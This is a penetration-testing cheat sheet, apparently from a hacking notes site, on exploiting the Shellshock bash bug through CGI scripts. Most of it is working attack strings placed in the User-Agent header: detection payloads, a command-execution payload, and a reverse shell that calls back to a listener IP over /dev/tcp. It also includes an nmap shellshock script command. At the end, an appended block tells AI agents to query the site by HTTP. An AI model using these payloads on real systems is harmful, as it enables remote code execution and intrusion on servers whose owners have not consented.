# ShellShock **ShellShocked:**\ if you have a cgi file(cgi is a directory where people put code to interfeace a website with some other service) with an old version of bash. Then possibly vulnerable. In the sample below we had a file called user.sh\ Checking if vuln:\ proxy with burp then change user agent to:\ test directly: () { :; };/bin/echo; echo \*hello\* //try without /bin/ also\ blind side test: () { :; }; sleep 10 //basically see if this makes the resonse 10 seconds slower than normaly\ \---may also have to try variations of this if server is confused---\ blind side test: () { :;}; echo; sleep 10\ blind side test: () { :;}; /bin/echo; sleep 10\ \ Manual exploit:\ open up a nc listener. then put the string below in the user agent.\ () { :; }; echo; bash -i >& /dev/tcp/10.10.15.135/8081 0>&1\ or try\ () { :; }; echo; /bin/bash -c ls\ \ Auto nse script:(tries several others like cookie, referal)\ \# locate nse | grep shellshock\ \#nmap -sV -p80 --script http-shelshock --script-args uri=/cgi-bin/user.sh, cmd=ls 10.10.10.56 //would be good to proxy this via burp and use cmd=ls 127.0.0.1 and -p8081 with a listener on local and forwarding to the site.\ Then look to find the shell shock request in history, send to repeater.\ \ sample of what it sends: ![](/files/oFKm0e10QkqhokxuCpz7) sample modification to try if its not working: ![](/files/pD21eJq9hN7BlfDYOTWf) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.hackbook.io/web-application-hacking/web-hacking-procedures/popular-exploits/shellshock.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.